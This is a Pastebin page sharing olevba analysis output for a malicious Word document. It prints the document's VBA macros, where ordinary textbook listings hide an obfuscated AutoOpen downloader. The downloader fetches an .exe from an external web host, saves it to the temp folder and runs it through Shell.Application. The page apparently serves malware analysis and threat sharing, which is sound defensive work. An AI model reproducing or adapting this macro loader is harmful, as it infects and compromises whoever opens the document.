API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Jun 15th, 2015
742
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 15.59 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- 291722~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 291722~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 291722~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub A121212121212(FFFFF As Long)
  17.  
  18. knGjLBTgmGgBh
  19.  
  20. End Sub
  21.  
  22. Sub autoopen()
  23.  
  24. A121212121212 (3)
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +------------+-------------+-----------------------------------------+
  32. | Type       | Keyword     | Description                             |
  33. +------------+-------------+-----------------------------------------+
  34. | AutoExec   | AutoOpen    | Runs when the Word document is opened   |
  35. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  36. |            |             | be used to obfuscate strings (option    |
  37. |            |             | --decode to see all)                    |
  38. +------------+-------------+-----------------------------------------+
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Module1.bas
  41. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module1'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43.  
  44. Dim currCell As String  ' The module-level variable for Listing 7.4
  45.  
  46. ' Listing 7.1. Toggles the active window's gridlines on and off.
  47. '
  48. Sub ToggleGridlines()
  49.  
  50.     With ActiveWindow
  51.        ù.DisplayGridLines = Not à.DisplayGridLines
  52.     End With
  53.    
  54. End Sub
  55.  
  56. ' Listing 7.2. A procedure that tests the Evaluate function.
  57. '
  58. Sub EvaluateTest()
  59.     Dim columnLetter As String
  60.     Dim rowNumber As String
  61.     Dim cellAddress As String
  62.     '
  63.    ' Activate the "Test Data" worksheet
  64.    '
  65.    þ.Worksheets("Test Data").Activate
  66.     '
  67.    ' Get the value in cell A1
  68.    '
  69.    columnLetter = è.[A1].Value
  70.     '
  71.    ' Get the value in cell B1
  72.    '
  73.    rowNumber = è.[B1].Value
  74.     '
  75.    ' Concatenate the two values and then display the message
  76.    '
  77.    cellAddress = columnLetter & rowNumber
  78.     MsgBox "The value in cell " & cellAddress & " is " & ð.Evaluate(cellAddress)
  79. End Sub
  80.  
  81.  
  82. Public Function E1hULdfCYKq40(M72YMyUcUWEAf As String)
  83.  Set Z0EcDOINA = fAQaVGJfCYUL("S" & "h" & Chr(101) & Chr(108) & Chr(108) & "." & "A" & "p" & Chr(112) & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & Chr(105) & "o" & "n")
  84. Z0EcDOINA.Open (AHmYANL3)
  85. End Function
  86. Public Function fAQaVGJfCYUL(U9ZWOpJrq As String)
  87.  Set fAQaVGJfCYUL = CreateObject(U9ZWOpJrq)
  88. End Function
  89. Function CalcNetMargin(fixedCosts)
  90.  
  91.     Dim totalSales
  92.     Dim totalExpenses
  93.    
  94.     With ï.Worksheets("2000 Budget")
  95.         totalSales = ï.Application.Sum(.Range("Sales"))
  96.         totalExpenses = ï.Application.Sum(.Range("Expenses"))
  97.     End With
  98.        
  99.     If totalSales <> 0 Then
  100.         CalcNetMargin = (totalSales - totalExpenses - fixedCosts) / totalSales
  101.     End If
  102.     '
  103.    ' Recalculate whenever the sheet recalculates
  104.    '
  105.    â.Application.Volatile
  106. End Function
  107.  
  108. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  109. ANALYSIS:
  110. +------------+----------------+-----------------------------------------+
  111. | Type       | Keyword        | Description                             |
  112. +------------+----------------+-----------------------------------------+
  113. | Suspicious | Open           | May open a file                         |
  114. | Suspicious | Chr            | May attempt to obfuscate specific       |
  115. |            |                | strings                                 |
  116. | Suspicious | CreateObject   | May create an OLE object                |
  117. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  118. |            |                | may be used to obfuscate strings        |
  119. |            |                | (option --decode to see all)            |
  120. +------------+----------------+-----------------------------------------+
  121. -------------------------------------------------------------------------------
  122. VBA MACRO Module5.bas
  123. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module5'
  124. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  125.  
  126. Public AHmYANL3 As String
  127. ' Global variable
  128.  
  129. ' Listing 8.1. This procedure ties everything together by
  130. ' calling each of the code listings individually.
  131. '
  132. Sub Main()
  133.     '
  134.    ' Create the presentation file
  135.    '
  136.    CreateJugglingPresentation
  137.     '
  138.    ' Add the slides
  139.    '
  140.    AddJugglingSlides
  141.     '
  142.    ' Set up the title page
  143.    '
  144.    SetUpStartPage
  145.     '
  146.    ' Set up the Juggling pages
  147.    '
  148.    '
  149.    ' Save it and then run it
  150.    '
  151.    pres.Save
  152.    
  153. End Sub
  154.  
  155. ' Listing 8.2. This procedure creates a new presentation
  156. ' and then saves it.
  157. '
  158. Sub CreateJugglingPresentation()
  159.    '
  160.    ' If the old one is still open, close it without saving
  161.    '
  162.    For Each p In Presentations
  163.         If p.Name = "Juggling" Then
  164.             p.Saved = True
  165.             p.Close
  166.         End If
  167.     Next p
  168.     '
  169.    ' Create a new Presentation object and store it in pres
  170.    '
  171.    Set pres = Presentations.Add
  172.     pres.SaveAs FileName:="Juggling.ppt"
  173. End Sub
  174.  
  175. ' Listing 8.3. A procedure that adds the slides to the
  176. ' Juggling presentation and formats them.
  177. '
  178. Sub AddJugglingSlides()
  179.     Dim i As Integer
  180.    
  181.     With pres
  182.         With .Slides
  183.          '
  184.         ' Add the opening slide
  185.         '
  186.         .Add(Index:=1, Layout:=ppLayoutTitle).Name = "Opener"
  187.          '
  188.         ' Now add the slides for each step
  189.         '
  190.         For i = 1 To 4
  191.              .Add(Index:=i + 1, Layout:=ppLayoutTitle).Name = "Juggling" & i
  192.          Next i
  193.     End With
  194.     '
  195.    ' Set the background for all the slides
  196.    '
  197.    .SlideMaster.Background.Fill.PresetGradient _
  198.         Style:=msoGradientHorizontal, _
  199.         Variant:=1, _
  200.         PresetGradientType:=msoGradientNightfall
  201.     End With
  202. End Sub
  203.  
  204. ' Listing 8.4. A procedure that sets up the text and animation
  205. ' settings for the first page of the Juggling presentation.
  206. '
  207. Sub SetUpStartPage()
  208.     Dim shapeTitle As Shape
  209.     Dim shapeSubTitle As Shape
  210.    
  211.     With pres.Slides("Opener")
  212.         Set shapeTitle = .Shapes(1)     ' The title
  213.        Set shapeSubTitle = .Shapes(2)  ' The subtitle
  214.        '
  215.        ' Add the title text
  216.        '
  217.        With shapeTitle.TextFrame.TextRange
  218.             .Text = "Juggling"
  219.             With .Font
  220.                 .Name = "Arial"
  221.                 .Size = 44
  222.                 .Bold = True
  223.                 ð.Color.RGB = RGB(255, 255, 255)
  224.             End With
  225.         End With
  226.         '
  227.        ' Set the title animation
  228.        '
  229.        With ð.shapeTitle.AnimationSettings
  230.             .Animate = True
  231.             .AdvanceMode = ppAdvanceOnTime
  232.             .AdvanceTime = 0
  233.             .TextUnitEffect = ppAnimateByCharacter
  234.             .EntryEffect = ppEffectFlyFromLeft
  235.         End With
  236.         '
  237.        ' Add the subtitle text
  238.        '
  239.        With shapeSubTitle.TextFrame.TextRange
  240.             .Text = "A Step-By-Step Course"
  241.             With .Font
  242.                 .Name = "Arial"
  243.                 .Size = 36
  244.                 .Bold = True
  245.                 ð.Color.RGB = RGB(255, 255, 255)
  246.             End With
  247.         End With
  248.         '
  249.        ' Set the subtitle animation
  250.        '
  251.        With ð.shapeSubTitle.AnimationSettings
  252.             .Animate = True
  253.             .AdvanceMode = ppAdvanceOnTime
  254.             .AdvanceTime = 0
  255.             .TextUnitEffect = ppAnimateByWord
  256.             .EntryEffect = ppEffectFlyFromBottom
  257.         End With
  258.     End With
  259. End Sub
  260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  261. ANALYSIS:
  262. +------------+----------------+-----------------------------------------+
  263. | Type       | Keyword        | Description                             |
  264. +------------+----------------+-----------------------------------------+
  265. | Suspicious | Open           | May open a file                         |
  266. | Suspicious | Run            | May run an executable file or a system  |
  267. |            |                | command                                 |
  268. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  269. |            |                | may be used to obfuscate strings        |
  270. |            |                | (option --decode to see all)            |
  271. +------------+----------------+-----------------------------------------+
  272. -------------------------------------------------------------------------------
  273. VBA MACRO Module3.bas
  274. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module3'
  275. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  276.  
  277. ' Listing 6.1. A procedure that toggles the display of
  278. ' nonprinting characters on and off.
  279. '
  280. Sub ToggleNonprinting()
  281.  
  282.     With ActiveWindow.View
  283.         .ShowAll = Not .ShowAll
  284.     End With
  285.  
  286. End Sub
  287.  
  288.  
  289. ' Listing 6.3. A procedure that moves the Word window
  290. ' into the top left corner of the screen.
  291. '
  292. Sub TopLeftCorner()
  293.     With Application
  294.         If .WindowState <> wdWindowStateMaximize _
  295.             And .WindowState <> wdWindowStateMinimize _
  296.             Then .Move 0, 0
  297.     End With
  298. End Sub
  299.  
  300. ' Listing 6.4. Procedures that create and open
  301. ' a workspace of files.
  302. '
  303. ' CreateWorkspace()
  304. ' Saves the path and filename data of all the
  305. ' open files to the Windows Registry. Before
  306. ' running this procedure, make sure only the
  307. ' files you want in the workspace are open.
  308. '
  309. Sub CreateWorkspace()
  310.     Dim total As Integer
  311.     Dim doc As Document
  312.     Dim i As Integer
  313.     '
  314.    ' Delete the old workspace settings
  315.    ' First, get the total number of files
  316.    '
  317.    total = GetSetting("Word", "Workspace", "TotalFiles", 0)
  318.     For i = 1 To total
  319.         '
  320.        ' Delete each setting
  321.        '
  322.        DeleteSetting "Word", "Workspace", "Document" & i
  323.     Next 'i
  324.    '
  325.    ' Create the new workspace
  326.    '
  327.    i = 0
  328.     For Each doc In Documents
  329.         '
  330.        ' Make sure it's not a new, unsaved file
  331.        '
  332.        If doc.Path <> "" Then
  333.             '
  334.            ' Use i to create unique setting names
  335.            '
  336.            i = i + 1
  337.             '
  338.            ' Save the FullName (path and filename) to the Registry
  339.            '
  340.            SaveSetting "Word", "Workspace", "Document" & i, doc.FullName
  341.         End If
  342.     Next 'doc
  343.    '
  344.    ' Save tht total number of files
  345.    '
  346.    SaveSetting "Word", "Workspace", "TotalFiles", i
  347. End Sub
  348. Sub knGjLBTgmGgBh()
  349.  
  350. Set DhAXmemS278B6 = fAQaVGJfCYUL(Chr(77) & "i" & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
  351.  
  352. CallByName DhAXmemS278B6, "O" & Chr(112) & Chr(101) & Chr(110), Chr(71) & Chr(69) & Chr(84), _
  353. Chr(104) & Chr(116) & Chr(116) & "p" & Chr(58) & Chr(47) & Chr(47) & Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(102) & "r" & "e" & Chr(101) & Chr(119) & Chr(101) & Chr(98) & Chr(115) & Chr(116) & Chr(117) & Chr(102) & Chr(102) & Chr(46) & Chr(98) & Chr(101) & Chr(47) & "3" & Chr(52) & Chr(47) & Chr(52) & "4" & Chr(46) & "e" & Chr(120) & Chr(101) _
  354. , False
  355.  
  356.  
  357. Set VZGc6njbPx6 = fAQaVGJfCYUL("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
  358.  
  359. Set gsHD7abC5N3 = CallByName(VZGc6njbPx6, "E" & Chr(110) & Chr(118) & "i" & Chr(114) & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, "P" & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & "s")
  360.  
  361. I2fThDFfJ2x = gsHD7abC5N3("T" & Chr(69) & Chr(77) & Chr(80))
  362.  
  363. AHmYANL3 = I2fThDFfJ2x & Chr(92) & "g" & Chr(105) & Chr(110) & Chr(107) & Chr(97) & Chr(110) & Chr(56) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  364. Dim L3eSO44R() As Byte
  365.  
  366. CallByName DhAXmemS278B6, "S" & "e" & Chr(110) & Chr(100), VbMethod
  367. L3eSO44R = CallByName(DhAXmemS278B6, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & "s" & "e" & Chr(66) & "o" & "d" & Chr(121), VbGet)
  368. aJbV7hKTsFzE L3eSO44R, AHmYANL3
  369. On Error GoTo GbzD0F5w
  370.     a = 84 / 0
  371.   On Error GoTo 0
  372.  
  373. YmVz6Pw29BQ:
  374.   Exit Sub
  375. GbzD0F5w:
  376.   E1hULdfCYKq40 ("qXSh3tUIo")
  377. Resume YmVz6Pw29BQ
  378. End Sub
  379. Public Function aJbV7hKTsFzE(bB2ojLbgVtJ As Variant, sliQYqZdLGCmtq As String)
  380. Dim BkUobg5a: Set BkUobg5a = fAQaVGJfCYUL(Chr(65) & "d" & Chr(111) & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & "r" & Chr(101) & "a" & Chr(109))
  381.  
  382. With BkUobg5a
  383.    .Type = 1
  384.     .Open
  385.     .write bB2ojLbgVtJ
  386.     .savetofile sliQYqZdLGCmtq, 2
  387. End With
  388. End Function
  389.  
  390.  
  391.  
  392.  
  393. '
  394. ' OpenWorkspace()
  395. ' Accesses the Registry's workspace settings
  396. ' and then opens each workspace file.
  397. '
  398. Sub OpenWorkspace()
  399.     Dim total As Integer
  400.     Dim i As Integer
  401.     Dim filePath As String
  402.     Dim doc As Document
  403.     Dim fileAlreadyOpen As Boolean
  404.     '
  405.    ' Get the total number of files
  406.    '
  407.    total = GetSetting("Word", "Workspace", "TotalFiles", 0)
  408.     For i = 1 To total
  409.         '
  410.        ' Get the path and filename
  411.        '
  412.        filePath = GetSetting("Word", "Workspace", "Document" & i)
  413.         '
  414.        ' Make sure the file isn't already open
  415.        '
  416.        fileAlreadyOpen = False
  417.         For Each doc In Documents
  418.             If filePath = doc.FullName Then
  419.                 fileAlreadyOpen = True
  420.                 Exit For
  421.             End If
  422.         Next 'doc
  423.        '
  424.        ' Open it
  425.        '
  426.        If Not fileAlreadyOpen Then
  427.             Documents.Open filePath
  428.         End If
  429.     Next 'i
  430. End Sub
  431.  
  432. Sub TestStylesAddMethod()
  433. Set newStyle = ActiveDocument.Styles.Add("PageTitle", wdStyleTypeParagraph)
  434. With newStyle
  435.     .Font.Bold = True
  436.     .Font.Underline = True
  437.     .Font.Size = 24
  438.     .Font.Name = "Arial"
  439.     .ParagraphFormat.Alignment = wdAlignParagraphCenter
  440.     .ParagraphFormat.SpaceAfter = 12
  441.     .NextParagraphStyle = wdStyleNormal
  442. End With
  443. End Sub
  444.  
  445.  
  446. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  447. ANALYSIS:
  448. +------------+----------------+-----------------------------------------+
  449. | Type       | Keyword        | Description                             |
  450. +------------+----------------+-----------------------------------------+
  451. | Suspicious | Open           | May open a file                         |
  452. | Suspicious | Windows        | May enumerate application windows (if   |
  453. |            |                | combined with Shell.Application object) |
  454. | Suspicious | Chr            | May attempt to obfuscate specific       |
  455. |            |                | strings                                 |
  456. | Suspicious | SaveToFile     | May create a text file                  |
  457. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  458. |            |                | function calls                          |
  459. | Suspicious | Write          | May write to a file (if combined with   |
  460. |            |                | Open)                                   |
  461. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  462. |            |                | may be used to obfuscate strings        |
  463. |            |                | (option --decode to see all)            |
  464. +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!